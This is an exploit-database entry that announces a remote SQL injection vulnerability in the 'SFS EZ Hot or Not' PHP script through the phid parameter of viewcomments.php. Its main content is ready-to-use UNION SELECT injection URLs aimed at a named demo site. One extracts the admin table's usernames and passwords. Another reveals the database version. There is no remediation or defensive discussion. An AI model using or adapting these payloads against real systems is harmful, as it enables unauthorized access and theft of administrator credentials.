id: 3996
date: 10/31/2008
title: SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability
author: d3b4g
cves: 

===========================================================
SFS EZ Hot or Not (phid) Remote SQL Injection Vulnerability
===========================================================


----------------------------------------------------------------
script : SFS EZ Hot ot Not 

script  :  http://www.scripts-for-sites.info

Risk : High

----------------------------------------------------------------

Discovered by : d3b4g

----------------------------------------------------------------
Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*


version: http: www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
----------------------------------------------------------------



#  0day.today [2023-03-24]  #